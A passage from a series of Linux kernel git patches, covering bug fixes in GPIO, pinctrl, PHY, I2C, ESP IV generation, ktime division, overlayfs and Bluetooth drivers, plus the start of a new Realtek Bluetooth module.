IOCB + * @data: A pointer to the immediate command data portion of the IOCB. + * @fcp_cmnd: The FCP Command that is provided by the SCSI layer. + * + * The routine copies the entire FCP command from @fcp_cmnd to @data while + * byte swapping the data to big endian format for transmission on the wire. + **/ +static void +lpfc_fcpcmd_to_iocb(uint8_t *data, struct fcp_cmnd *fcp_cmnd) +{ + int i, j; + for (i = 0, j = 0; i < sizeof(struct fcp_cmnd); + i += sizeof(uint32_t), j++) { + ((uint32_t *)data)[j] = cpu_to_be32(((uint32_t *)fcp_cmnd)[j]); + } +} + /** * lpfc_scsi_prep_cmnd - Wrapper func for convert scsi cmnd to FCP info unit * @vport: The virtual port for which this call is being executed. @@ -4225,6 +4223,9 @@ lpfc_scsi_prep_cmnd(struct lpfc_vport *vport, struct lpfc_scsi_buf *lpfc_cmd, fcp_cmnd->fcpCntl3 = 0; phba->fc4ControlRequests++; } + if (phba->sli_rev == 3 && + !(phba->sli3_options & LPFC_SLI3_BG_ENABLED)) + lpfc_fcpcmd_to_iocb(iocb_cmd->unsli3.fcp_ext.icd, fcp_cmnd); /* * Finish initializing those IOCB fields that are independent * of the scsi_cmnd request_buffer From 6d86750ce62391f5a0a7985d5c050c2e3c823ab9 Mon Sep 17 00:00:00 2001 From: Johan Hovold Date: Mon, 4 May 2015 17:23:25 +0200 Subject: [PATCH 034/872] gpio: fix gpio leak in gpiochip_add error path Make sure to free any hogged gpios on errors in gpiochip_add. Also move all forward declarations to the top of the file. Fixes: f625d4601759 ("gpio: add GPIO hogging mechanism") Signed-off-by: Johan Hovold Reviewed-by: Alexandre Courbot Signed-off-by: Linus Walleij --- drivers/gpio/gpiolib.c | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/drivers/gpio/gpiolib.c b/drivers/gpio/gpiolib.c index 59eaa23767d8..6bc612b8a49f 100644 --- a/drivers/gpio/gpiolib.c +++ b/drivers/gpio/gpiolib.c @@ -53,6 +53,11 @@ static DEFINE_MUTEX(gpio_lookup_lock); static LIST_HEAD(gpio_lookup_list); LIST_HEAD(gpio_chips); + +static void gpiochip_free_hogs(struct gpio_chip *chip); +static void gpiochip_irqchip_remove(struct gpio_chip *gpiochip); + + static inline void desc_set_label(struct gpio_desc *d, const char *label) { d->label = label; @@ -297,6 +302,7 @@ int gpiochip_add(struct gpio_chip *chip) err_remove_chip: acpi_gpiochip_remove(chip); + gpiochip_free_hogs(chip); of_gpiochip_remove(chip); spin_lock_irqsave(&gpio_lock, flags); list_del(&chip->list); @@ -313,10 +319,6 @@ int gpiochip_add(struct gpio_chip *chip) } EXPORT_SYMBOL_GPL(gpiochip_add); -/* Forward-declaration */ -static void gpiochip_irqchip_remove(struct gpio_chip *gpiochip); -static void gpiochip_free_hogs(struct gpio_chip *chip); - /** * gpiochip_remove() - unregister a gpio_chip * @chip: the chip to unregister From f230e8ffc03f17bd9d6b90ea890b8252a8cc1821 Mon Sep 17 00:00:00 2001 From: Michael Brunner Date: Mon, 11 May 2015 12:46:49 +0200 Subject: [PATCH 035/872] gpio: gpio-kempld: Fix get_direction return value This patch fixes an inverted return value of the gpio get_direction function. The wrong value causes the direction sysfs entry and GPIO debugfs file to indicate incorrect GPIO direction settings. In some cases it also prevents setting GPIO output values. The problem is also present in all other stable kernel versions since linux-3.12. Cc: Stable # v3.12+ Reported-by: Jochen Henneberg Signed-off-by: Michael Brunner Reviewed-by: Guenter Roeck Signed-off-by: Linus Walleij --- drivers/gpio/gpio-kempld.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/gpio/gpio-kempld.c b/drivers/gpio/gpio-kempld.c index 6b8115f34208..83f281dda1e0 100644 --- a/drivers/gpio/gpio-kempld.c +++ b/drivers/gpio/gpio-kempld.c @@ -117,7 +117,7 @@ static int kempld_gpio_get_direction(struct gpio_chip *chip, unsigned offset) = container_of(chip, struct kempld_gpio_data, chip); struct kempld_device_data *pld = gpio->pld; - return kempld_gpio_get_bit(pld, KEMPLD_GPIO_DIR_NUM(offset), offset); + return !kempld_gpio_get_bit(pld, KEMPLD_GPIO_DIR_NUM(offset), offset); } static int kempld_gpio_pincount(struct kempld_device_data *pld) From e6c906dedb8a332ece0e789980eef340fdcd9e20 Mon Sep 17 00:00:00 2001 From: Mika Westerberg Date: Tue, 12 May 2015 13:35:37 +0300 Subject: [PATCH 036/872] pinctrl: cherryview: Read triggering type from HW if not set when requested If a driver does not set interrupt triggering type when it calls request_irq(), it means use the pin as the hardware/firmware has configured it. There are some drivers doing this. One example is drivers/input/serio/i8042.c that requests the interrupt like: error = request_irq(I8042_KBD_IRQ, i8042_interrupt, IRQF_SHARED, "i8042", i8042_platform_device); It assumes the interrupt is already properly configured. This is true in case of interrupts connected to the IO-APIC. However, some Intel Braswell/Cherryview based machines use a GPIO here instead for the internal keyboard controller. This is a problem because even if the pin/interrupt is properly configured, the irqchip ->irq_set_type() will never be called as the triggering flags are 0. Because of that we do not have correct interrupt flow handler set for the interrupt. Fix this by adding a custom ->irq_startup() that checks if the interrupt has no triggering type set and in that case read the type directly from the hardware and install correct flow handler along with the mapping. Reported-by: Jagadish Krishnamoorthy Reported-by: Freddy Paul Signed-off-by: Mika Westerberg Signed-off-by: Linus Walleij --- drivers/pinctrl/intel/pinctrl-cherryview.c | 44 ++++++++++++++++++++++ 1 file changed, 44 insertions(+) diff --git a/drivers/pinctrl/intel/pinctrl-cherryview.c b/drivers/pinctrl/intel/pinctrl-cherryview.c index 82f691eeeec4..732ff757a95f 100644 --- a/drivers/pinctrl/intel/pinctrl-cherryview.c +++ b/drivers/pinctrl/intel/pinctrl-cherryview.c @@ -1292,6 +1292,49 @@ static void chv_gpio_irq_unmask(struct irq_data *d) chv_gpio_irq_mask_unmask(d, false); } +static unsigned chv_gpio_irq_startup(struct irq_data *d) +{ + /* + * Check if the interrupt has been requested with 0 as triggering + * type. In that case it is assumed that the current values + * programmed to the hardware are used (e.g BIOS configured + * defaults). + * + * In that case ->irq_set_type() will never be called so we need to + * read back the values from hardware now, set correct flow handler + * and update mappings before the interrupt is being used. + */ + if (irqd_get_trigger_type(d) == IRQ_TYPE_NONE) { + struct gpio_chip *gc = irq_data_get_irq_chip_data(d); + struct chv_pinctrl *pctrl = gpiochip_to_pinctrl(gc); + unsigned offset = irqd_to_hwirq(d); + int pin = chv_gpio_offset_to_pin(pctrl, offset); + irq_flow_handler_t handler; + unsigned long flags; + u32 intsel, value; + + intsel = readl(chv_padreg(pctrl, pin, CHV_PADCTRL0)); + intsel &= CHV_PADCTRL0_INTSEL_MASK; + intsel >>= CHV_PADCTRL0_INTSEL_SHIFT; + + value = readl(chv_padreg(pctrl, pin, CHV_PADCTRL1)); + if (value & CHV_PADCTRL1_INTWAKECFG_LEVEL) + handler = handle_level_irq; + else + handler = handle_edge_irq; + + spin_lock_irqsave(&pctrl->lock, flags); + if (!pctrl->intr_lines[intsel]) { + __irq_set_handler_locked(d->irq, handler); + pctrl->intr_lines[intsel] = offset; + } + spin_unlock_irqrestore(&pctrl->lock, flags); + } + + chv_gpio_irq_unmask(d); + return 0; +} + static int chv_gpio_irq_type(struct irq_data *d, unsigned type) { struct gpio_chip *gc = irq_data_get_irq_chip_data(d); @@ -1357,6 +1400,7 @@ static int chv_gpio_irq_type(struct irq_data *d, unsigned type) static struct irq_chip chv_gpio_irqchip = { .name = "chv-gpio", + .irq_startup = chv_gpio_irq_startup, .irq_ack = chv_gpio_irq_ack, .irq_mask = chv_gpio_irq_mask, .irq_unmask = chv_gpio_irq_unmask, From 4d051f74cbb270310d1af3f56d4c83801d8bedc8 Mon Sep 17 00:00:00 2001 From: Stephen Boyd Date: Fri, 10 Apr 2015 16:11:04 -0700 Subject: [PATCH 037/872] phy: qcom-ufs: Switch dependency to ARCH_QCOM This phy only exists on platforms under ARCH_QCOM, not ARCH_MSM. Cc: Yaniv Gardi Cc: Dov Levenglick Cc: Christoph Hellwig Cc: David Brown Cc: Bryan Huntsman Cc: Daniel Walker Signed-off-by: Stephen Boyd Reviewed-by: Yaniv Gardi Signed-off-by: Kishon Vijay Abraham I --- drivers/phy/Kconfig | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/phy/Kconfig b/drivers/phy/Kconfig index a53bd5b52df9..33e703eec87b 100644 --- a/drivers/phy/Kconfig +++ b/drivers/phy/Kconfig @@ -304,7 +304,7 @@ config PHY_STIH41X_USB config PHY_QCOM_UFS tristate "Qualcomm UFS PHY driver" - depends on OF && ARCH_MSM + depends on OF && ARCH_QCOM select GENERIC_PHY help Support for UFS PHY on QCOM chipsets. From 7f7a4d306ff87502dc26860f54e798693cf9b1e1 Mon Sep 17 00:00:00 2001 From: Felipe Balbi Date: Tue, 28 Apr 2015 11:13:15 -0500 Subject: [PATCH 038/872] phy: fix Kconfig dependencies DM816x PHY uses usb_phy_* methods and because of that, it must select USB_PHY, however, because the drivers in question (DM816x, TWL4030 and OMAP_USB2) sit outside of drivers/usb/ directory, meaning they can be built even if USB_SUPPORT=n. This patches fixes the dependencies by adding USB_SUPPORT as a dependency and making all drivers select USB_PHY (which cannot be selected through menuconfig). Note that this fixes some linking breakages when building with randconfig. Cc: Tony Lindgren Cc: Kishon Vijay Abraham I Acked-by: Tony Lindgren Signed-off-by: Felipe Balbi Signed-off-by: Kishon Vijay Abraham I --- drivers/phy/Kconfig | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/drivers/phy/Kconfig b/drivers/phy/Kconfig index 33e703eec87b..fc9b9f0ea91e 100644 --- a/drivers/phy/Kconfig +++ b/drivers/phy/Kconfig @@ -38,7 +38,9 @@ config ARMADA375_USBCLUSTER_PHY config PHY_DM816X_USB tristate "TI dm816x USB PHY driver" depends on ARCH_OMAP2PLUS + depends on USB_SUPPORT select GENERIC_PHY + select USB_PHY help Enable this for dm816x USB to work. @@ -97,8 +99,9 @@ config OMAP_CONTROL_PHY config OMAP_USB2 tristate "OMAP USB2 PHY Driver" depends on ARCH_OMAP2PLUS - depends on USB_PHY + depends on USB_SUPPORT select GENERIC_PHY + select USB_PHY select OMAP_CONTROL_PHY depends on OMAP_OCP2SCP help @@ -122,8 +125,9 @@ config TI_PIPE3 config TWL4030_USB tristate "TWL4030 USB Transceiver Driver" depends on TWL4030_CORE && REGULATOR_TWL4030 && USB_MUSB_OMAP2PLUS - depends on USB_PHY + depends on USB_SUPPORT select GENERIC_PHY + select USB_PHY help Enable this to support the USB OTG transceiver on TWL4030 family chips (including the TWL5030 and TPS659x0 devices). From 4581f798ec7373bea4530b7e57e6c6842f132bbd Mon Sep 17 00:00:00 2001 From: Kishon Vijay Abraham I Date: Mon, 4 May 2015 22:07:33 +0530 Subject: [PATCH 039/872] phy: omap-usb2: invoke pm_runtime_disable on error path if devm_clk_get for wkupclk fails, there will be an unbalanced pm_runtime_enable. Fix it here. Reported-by: Benoit Parrot Cc: Roger Quadros Signed-off-by: Kishon Vijay Abraham I --- drivers/phy/phy-omap-usb2.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/phy/phy-omap-usb2.c b/drivers/phy/phy-omap-usb2.c index 183ef4368101..c1a468686bdc 100644 --- a/drivers/phy/phy-omap-usb2.c +++ b/drivers/phy/phy-omap-usb2.c @@ -275,6 +275,7 @@ static int omap_usb2_probe(struct platform_device *pdev) phy->wkupclk = devm_clk_get(phy->dev, "usb_phy_cm_clk32k"); if (IS_ERR(phy->wkupclk)) { dev_err(&pdev->dev, "unable to get usb_phy_cm_clk32k\n"); + pm_runtime_disable(phy->dev); return PTR_ERR(phy->wkupclk); } else { dev_warn(&pdev->dev, From a3ac3d4a296ac88578c3a982d044e53284d85344 Mon Sep 17 00:00:00 2001 From: Yoshihiro Shimoda Date: Thu, 2 Apr 2015 17:01:11 +0900 Subject: [PATCH 040/872] phy: phy-rcar-gen2: Fix USBHS_UGSTS_LOCK value According to the technical update (No. TN-RCS-B011A/E), the UGSTS LOCK bit location is bit 8, not bits 1 and 0. It also says that the register address offset of UGSTS is 0x88, not 0x90. So, this patch fixes the USBHS_UGSTS_LOCK value and some comments. Signed-off-by: Yoshihiro Shimoda Signed-off-by: Kishon Vijay Abraham I --- drivers/phy/phy-rcar-gen2.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/phy/phy-rcar-gen2.c b/drivers/phy/phy-rcar-gen2.c index 778276aba3aa..97d45f47d1ad 100644 --- a/drivers/phy/phy-rcar-gen2.c +++ b/drivers/phy/phy-rcar-gen2.c @@ -23,7 +23,7 @@ #define USBHS_LPSTS 0x02 #define USBHS_UGCTRL 0x80 #define USBHS_UGCTRL2 0x84 -#define USBHS_UGSTS 0x88 /* The manuals have 0x90 */ +#define USBHS_UGSTS 0x88 /* From technical update */ /* Low Power Status register (LPSTS) */ #define USBHS_LPSTS_SUSPM 0x4000 @@ -41,7 +41,7 @@ #define USBHS_UGCTRL2_USB0SEL_HS_USB 0x00000030 /* USB General status register (UGSTS) */ -#define USBHS_UGSTS_LOCK 0x00000300 /* The manuals have 0x3 */ +#define USBHS_UGSTS_LOCK 0x00000100 /* From technical update */ #define PHYS_PER_CHANNEL 2 From 3e59ae4aa28237ced95413fbd46004b57c4da095 Mon Sep 17 00:00:00 2001 From: Axel Lin Date: Fri, 8 May 2015 08:50:11 +0800 Subject: [PATCH 041/872] i2c: hix5hd2: Fix modalias to make module auto-loading work Make the modalias match driver name, this is required to make module auto-loading work. Signed-off-by: Axel Lin Acked-by: Zhangfei Gao Signed-off-by: Wolfram Sang Cc: stable@kernel.org --- drivers/i2c/busses/i2c-hix5hd2.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/i2c/busses/i2c-hix5hd2.c b/drivers/i2c/busses/i2c-hix5hd2.c index 8fe78d08e01c..7c6966434ee7 100644 --- a/drivers/i2c/busses/i2c-hix5hd2.c +++ b/drivers/i2c/busses/i2c-hix5hd2.c @@ -554,4 +554,4 @@ module_platform_driver(hix5hd2_i2c_driver); MODULE_DESCRIPTION("Hix5hd2 I2C Bus driver"); MODULE_AUTHOR("Wei Yan "); MODULE_LICENSE("GPL"); -MODULE_ALIAS("platform:i2c-hix5hd2"); +MODULE_ALIAS("platform:hix5hd2-i2c"); From 8d487a43c36b54a029d74ad3b0a6a9d1253e728a Mon Sep 17 00:00:00 2001 From: Vasily Khoruzhick Date: Sun, 3 May 2015 21:13:10 +0300 Subject: [PATCH 042/872] i2c: s3c2410: fix oops in suspend callback for non-dt platforms Initialize sysreg by default, otherwise driver will crash in suspend callback when not using DT. Signed-off-by: Vasily Khoruzhick Reviewed-by: Krzysztof Kozlowski Signed-off-by: Wolfram Sang Cc: stable@kernel.org Fixes: a7750c3ef01223 ("i2c: s3c2410: Handle i2c sys_cfg register in i2c driver") --- drivers/i2c/busses/i2c-s3c2410.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/i2c/busses/i2c-s3c2410.c b/drivers/i2c/busses/i2c-s3c2410.c index 958c8db4ec30..297e9c9ac943 100644 --- a/drivers/i2c/busses/i2c-s3c2410.c +++ b/drivers/i2c/busses/i2c-s3c2410.c @@ -1143,6 +1143,7 @@ static int s3c24xx_i2c_probe(struct platform_device *pdev) return -ENOMEM; i2c->quirks = s3c24xx_get_device_quirks(pdev); + i2c->sysreg = ERR_PTR(-ENOENT); if (pdata) memcpy(i2c->pdata, pdata, sizeof(*pdata)); else From 64aa42338e9a88c139b89797163714f0f95f3c6b Mon Sep 17 00:00:00 2001 From: Herbert Xu Date: Wed, 13 May 2015 15:26:10 +0800 Subject: [PATCH 043/872] esp4: Use high-order sequence number bits for IV generation I noticed we were only using the low-order bits for IV generation when ESN is enabled. This is very bad because it means that the IV can repeat. We must use the full 64 bits. Signed-off-by: Herbert Xu Signed-off-by: Steffen Klassert --- net/ipv4/esp4.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/net/ipv4/esp4.c b/net/ipv4/esp4.c index 421a80b09b62..30b544f025ac 100644 --- a/net/ipv4/esp4.c +++ b/net/ipv4/esp4.c @@ -256,7 +256,8 @@ static int esp_output(struct xfrm_state *x, struct sk_buff *skb) aead_givcrypt_set_crypt(req, sg, sg, clen, iv); aead_givcrypt_set_assoc(req, asg, assoclen); aead_givcrypt_set_giv(req, esph->enc_data, - XFRM_SKB_CB(skb)->seq.output.low); + XFRM_SKB_CB(skb)->seq.output.low + + ((u64)XFRM_SKB_CB(skb)->seq.output.hi << 32)); ESP_SKB_CB(skb)->tmp = tmp; err = crypto_aead_givencrypt(req); From 6d7258ca937027ae86d6d5938d7ae10b6d68f4a4 Mon Sep 17 00:00:00 2001 From: Herbert Xu Date: Wed, 13 May 2015 15:27:18 +0800 Subject: [PATCH 044/872] esp6: Use high-order sequence number bits for IV generation I noticed we were only using the low-order bits for IV generation when ESN is enabled. This is very bad because it means that the IV can repeat. We must use the full 64 bits. Signed-off-by: Herbert Xu Signed-off-by: Steffen Klassert --- net/ipv6/esp6.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/net/ipv6/esp6.c b/net/ipv6/esp6.c index 31f1b5d5e2ef..7c07ce36aae2 100644 --- a/net/ipv6/esp6.c +++ b/net/ipv6/esp6.c @@ -248,7 +248,8 @@ static int esp6_output(struct xfrm_state *x, struct sk_buff *skb) aead_givcrypt_set_crypt(req, sg, sg, clen, iv); aead_givcrypt_set_assoc(req, asg, assoclen); aead_givcrypt_set_giv(req, esph->enc_data, - XFRM_SKB_CB(skb)->seq.output.low); + XFRM_SKB_CB(skb)->seq.output.low + + ((u64)XFRM_SKB_CB(skb)->seq.output.hi << 32)); ESP_SKB_CB(skb)->tmp = tmp; err = crypto_aead_givencrypt(req); From f7bcb70ebae0dcdb5a2d859b09e4465784d99029 Mon Sep 17 00:00:00 2001 From: John Stultz Date: Fri, 8 May 2015 13:47:23 -0700 Subject: [PATCH 045/872] ktime: Fix ktime_divns to do signed division It was noted that the 32bit implementation of ktime_divns() was doing unsigned division and didn't properly handle negative values. And when a ktime helper was changed to utilize ktime_divns, it caused a regression on some IR blasters. See the following bugzilla for details: https://bugzilla.redhat.com/show_bug.cgi?id=1200353 This patch fixes the problem in ktime_divns by checking and preserving the sign bit, and then reapplying it if appropriate after the division, it also changes the return type to a s64 to make it more obvious this is expected. Nicolas also pointed out that negative dividers would cause infinite loops on 32bit systems, negative dividers is unlikely for users of this function, but out of caution this patch adds checks for negative dividers for both 32-bit (BUG_ON) and 64-bit(WARN_ON) versions to make sure no such use cases creep in. [ tglx: Hand an u64 to do_div() to avoid the compiler warning ] Fixes: 166afb64511e 'ktime: Sanitize ktime_to_us/ms conversion' Reported-and-tested-by: Trevor Cordes Signed-off-by: John Stultz Acked-by: Nicolas Pitre Cc: Ingo Molnar Cc: Josh Boyer Cc: One Thousand Gnomes Cc: Link: http://lkml.kernel.org/r/1431118043-23452-1-git-send-email-john.stultz@linaro.org Signed-off-by: Thomas Gleixner --- include/linux/ktime.h | 27 +++++++++++++++++++++------ kernel/time/hrtimer.c | 14 ++++++++------ 2 files changed, 29 insertions(+), 12 deletions(-) diff --git a/include/linux/ktime.h b/include/linux/ktime.h index 5fc3d1083071..2b6a204bd8d4 100644 --- a/include/linux/ktime.h +++ b/include/linux/ktime.h @@ -166,19 +166,34 @@ static inline bool ktime_before(const ktime_t cmp1, const ktime_t cmp2) } #if BITS_PER_LONG < 64 -extern u64 __ktime_divns(const ktime_t kt, s64 div); -static inline u64 ktime_divns(const ktime_t kt, s64 div) +extern s64 __ktime_divns(const ktime_t kt, s64 div); +static inline s64 ktime_divns(const ktime_t kt, s64 div) { + /* + * Negative divisors could cause an inf loop, + * so bug out here. + */ + BUG_ON(div < 0); if (__builtin_constant_p(div) && !(div >> 32)) { - u64 ns = kt.tv64; - do_div(ns, div); - return ns; + s64 ns = kt.tv64; + u64 tmp = ns < 0 ? -ns : ns; + + do_div(tmp, div); + return ns < 0 ? -tmp : tmp; } else { return __ktime_divns(kt, div); } } #else /* BITS_PER_LONG < 64 */ -# define ktime_divns(kt, div) (u64)((kt).tv64 / (div)) +static inline s64 ktime_divns(const ktime_t kt, s64 div) +{ + /* + * 32-bit implementation cannot handle negative divisors, + * so catch them on 64bit as well. + */ + WARN_ON(div < 0); + return kt.tv64 / div; +} #endif static inline s64 ktime_to_us(const ktime_t kt) diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c index 76d4bd962b19..93ef7190bdea 100644 --- a/kernel/time/hrtimer.c +++ b/kernel/time/hrtimer.c @@ -266,21 +266,23 @@ lock_hrtimer_base(const struct hrtimer *timer, unsigned long *flags) /* * Divide a ktime value by a nanosecond value */ -u64 __ktime_divns(const ktime_t kt, s64 div) +s64 __ktime_divns(const ktime_t kt, s64 div) { - u64 dclc; int sft = 0; + s64 dclc; + u64 tmp; dclc = ktime_to_ns(kt); + tmp = dclc < 0 ? -dclc : dclc; + /* Make sure the divisor is less than 2^32: */ while (div >> 32) { sft++; div >>= 1; } - dclc >>= sft; - do_div(dclc, (unsigned long) div); - - return dclc; + tmp >>= sft; + do_div(tmp, (unsigned long) div); + return dclc < 0 ? -tmp : tmp; } EXPORT_SYMBOL_GPL(__ktime_divns); #endif /* BITS_PER_LONG >= 64 */ From 4541c561b6abeb52ad5d9428e4a23e037bbe2b49 Mon Sep 17 00:00:00 2001 From: Leo Yan Date: Tue, 5 May 2015 15:09:17 +0800 Subject: [PATCH 046/872] Bluetooth: btwilink: remove DEBUG define Remove the DEBUG define as the debug code; so can remove mass debug info from log buffer when using dmesg. Signed-off-by: Leo Yan Signed-off-by: Marcel Holtmann --- drivers/bluetooth/btwilink.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/bluetooth/btwilink.c b/drivers/bluetooth/btwilink.c index 55c135b7757a..7a722df97343 100644 --- a/drivers/bluetooth/btwilink.c +++ b/drivers/bluetooth/btwilink.c @@ -22,7 +22,7 @@ * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA * */ -#define DEBUG + #include #include #include From a1e85f04d8c73f885de1cca46515f66b82049231 Mon Sep 17 00:00:00 2001 From: Xinming Hu Date: Tue, 21 Apr 2015 06:59:56 -0700 Subject: [PATCH 047/872] Bluetooth: btmrvl: fix compilation warning This patch fixes a compile warnning "dump_num maybe used uninitialized in this function". Signed-off-by: Xinming Hu Signed-off-by: Amitkumar Karwar Signed-off-by: Marcel Holtmann --- drivers/bluetooth/btmrvl_sdio.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/bluetooth/btmrvl_sdio.c b/drivers/bluetooth/btmrvl_sdio.c index 01d6da577eeb..b9a811900f6a 100644 --- a/drivers/bluetooth/btmrvl_sdio.c +++ b/drivers/bluetooth/btmrvl_sdio.c @@ -1217,7 +1217,7 @@ static void btmrvl_sdio_dump_firmware(struct btmrvl_private *priv) unsigned int reg, reg_start, reg_end; enum rdwr_status stat; u8 *dbg_ptr, *end_ptr, *fw_dump_data, *fw_dump_ptr; - u8 dump_num, idx, i, read_reg, doneflag = 0; + u8 dump_num = 0, idx, i, read_reg, doneflag = 0; u32 memory_size, fw_dump_len = 0; /* dump sdio register first */ From a29ef819f3f34f89a1b9b6a939b4c1cdfe1e85ce Mon Sep 17 00:00:00 2001 From: Philippe Reynes Date: Wed, 13 May 2015 00:18:26 +0200 Subject: [PATCH 048/872] ARM: dts: imx27: only map 4 Kbyte for fec registers MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit According to the imx27 documentation, fec has a 4 Kbyte memory space map. Moreover, the actual 16 Kbyte mapping overlaps the SCC (Security Controller) memory register space. So, we reduce the memory register space to 4 Kbyte. Signed-off-by: Philippe Reynes Acked-by: Uwe Kleine-König Fixes: 9f0749e3eb88 ("ARM i.MX27: Add devicetree support") Cc: Signed-off-by: Shawn Guo --- arch/arm/boot/dts/imx27.dtsi | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/arm/boot/dts/imx27.dtsi b/arch/arm/boot/dts/imx27.dtsi index 6951b66d1ab7..bc215e4b75fd 100644 --- a/arch/arm/boot/dts/imx27.dtsi +++ b/arch/arm/boot/dts/imx27.dtsi @@ -533,7 +533,7 @@ fec: ethernet@1002b000 { compatible = "fsl,imx27-fec"; - reg = <0x1002b000 0x4000>; + reg = <0x1002b000 0x1000>; interrupts = <50>; clocks = <&clks IMX27_CLK_FEC_IPG_GATE>, <&clks IMX27_CLK_FEC_AHB_GATE>; From d377c5eb54dd05aeb3094b7740252d19ba7791f7 Mon Sep 17 00:00:00 2001 From: Miklos Szeredi Date: Thu, 14 May 2015 10:04:44 +0200 Subject: [PATCH 049/872] ovl: don't remove non-empty opaque directory When removing an opaque directory we can't just call rmdir() to check for emptiness, because the directory will need to be replaced with a whiteout. The replacement is done with RENAME_EXCHANGE, which doesn't check emptiness. Solution is just to check emptiness by reading the directory. In the future we could add a new rename flag to check for emptiness even for RENAME_EXCHANGE to optimize this case. Reported-by: Vincent Batts Signed-off-by: Miklos Szeredi Tested-by: Jordi Pujol Palomer Fixes: 263b4a0fee43 ("ovl: dont replace opaque dir") Cc: # v4.0+ --- fs/overlayfs/dir.c | 24 +++++++++++++++++++----- 1 file changed, 19 insertions(+), 5 deletions(-) diff --git a/fs/overlayfs/dir.c b/fs/overlayfs/dir.c index d139405d2bfa..2578a0c0677d 100644 --- a/fs/overlayfs/dir.c +++ b/fs/overlayfs/dir.c @@ -506,11 +506,25 @@ static int ovl_remove_and_whiteout(struct dentry *dentry, bool is_dir) struct dentry *opaquedir = NULL; int err; - if (is_dir && OVL_TYPE_MERGE_OR_LOWER(ovl_path_type(dentry))) { - opaquedir = ovl_check_empty_and_clear(dentry); - err = PTR_ERR(opaquedir); - if (IS_ERR(opaquedir)) - goto out; + if (is_dir) { + if (OVL_TYPE_MERGE_OR_LOWER(ovl_path_type(dentry))) { + opaquedir = ovl_check_empty_and_clear(dentry); + err = PTR_ERR(opaquedir); + if (IS_ERR(opaquedir)) + goto out; + } else { + LIST_HEAD(list); + + /* + * When removing an empty opaque directory, then it + * makes no sense to replace it with an exact replica of + * itself. But emptiness still needs to be checked. + */ + err = ovl_check_empty_dir(dentry, &list); + ovl_cache_free(&list); + if (err) + goto out; + } } err = ovl_lock_rename_workdir(workdir, upperdir); From db33c77dddc2ed2cff3061d0b096a9f5ab0c3647 Mon Sep 17 00:00:00 2001 From: Carlo Caione Date: Thu, 14 May 2015 10:49:09 +0200 Subject: [PATCH 050/872] Bluetooth: btrtl: Create separate module for Realtek BT driver As already done for btintel and btbcm export setup as separate function in a vendor-specific module to hold all the Realtek specific commands. Signed-off-by: Carlo Caione Signed-off-by: Marcel Holtmann --- drivers/bluetooth/Kconfig | 15 ++ drivers/bluetooth/Makefile | 1 + drivers/bluetooth/btrtl.c | 390 +++++++++++++++++++++++++++++++++++++ drivers/bluetooth/btrtl.h | 52 +++++ drivers/bluetooth/btusb.c | 377 +---------------------------------- 5 files changed, 462 insertions(+), 373 deletions(-) create mode 100644 drivers/bluetooth/btrtl.c create mode 100644 drivers/bluetooth/btrtl.h diff --git a/drivers/bluetooth/Kconfig b/drivers/bluetooth/Kconfig index ed5c2738bea2..2e777071e1dc 100644 --- a/drivers/bluetooth/Kconfig +++ b/drivers/bluetooth/Kconfig @@ -9,6 +9,10 @@ config BT_BCM tristate select FW_LOADER +config BT_RTL + tristate + select FW_LOADER + config BT_HCIBTUSB tristate "HCI USB driver" depends on USB @@ -32,6 +36,17 @@ config BT_HCIBTUSB_BCM Say Y here to compile support for Broadcom protocol. +config BT_HCIBTUSB_RTL + bool "Realtek protocol support" + depends on BT_HCIBTUSB + select BT_RTL + default y + help + The Realtek protocol support enables firmware and configuration + download support for Realtek Bluetooth controllers. + + Say Y here to compile support for Realtek protocol. + config BT_HCIBTSDIO tristate "HCI SDIO driver" depends on MMC diff --git a/drivers/bluetooth/Makefile b/drivers/bluetooth/Makefile index dd0d9c40b999..f40e194e7080 100644 --- a/drivers/bluetooth/Makefile +++ b/drivers/bluetooth/Makefile @@ -21,6 +21,7 @@ obj-$(CONFIG_BT_MRVL) += btmrvl.o obj-$(CONFIG_BT_MRVL_SDIO) += btmrvl_sdio.o obj-$(CONFIG_BT_WILINK) += btwilink.o obj-$(CONFIG_BT_BCM) += btbcm.o +obj-$(CONFIG_BT_RTL) += btrtl.o btmrvl-y := btmrvl_main.o btmrvl-$(CONFIG_DEBUG_FS) += btmrvl_debugfs.o diff --git a/drivers/bluetooth/btrtl.c b/drivers/bluetooth/btrtl.c new file mode 100644 index 000000000000..84288938f7f2 --- /dev/null +++ b/drivers/bluetooth/btrtl.c @@ -0,0 +1,390 @@ +/* + * Bluetooth support for Realtek devices + * + * Copyright (C) 2015 Endless Mobile, Inc. + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation; either version 2 of the License, or + * (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + */ + +#include +#include +#include +#include + +#include +#include + +#include "btrtl.h" + +#define VERSION "0.1" + +#define RTL_EPATCH_SIGNATURE "Realtech" +#define RTL_ROM_LMP_3499 0x3499 +#define RTL_ROM_LMP_8723A 0x1200 +#define RTL_ROM_LMP_8723B 0x8723 +#define RTL_ROM_LMP_8821A 0x8821 +#define RTL_ROM_LMP_8761A 0x8761 + +static int rtl_read_rom_version(struct hci_dev *hdev, u8 *version) +{ + struct rtl_rom_version_evt *rom_version; + struct sk_buff *skb; + + /* Read RTL ROM version command */ 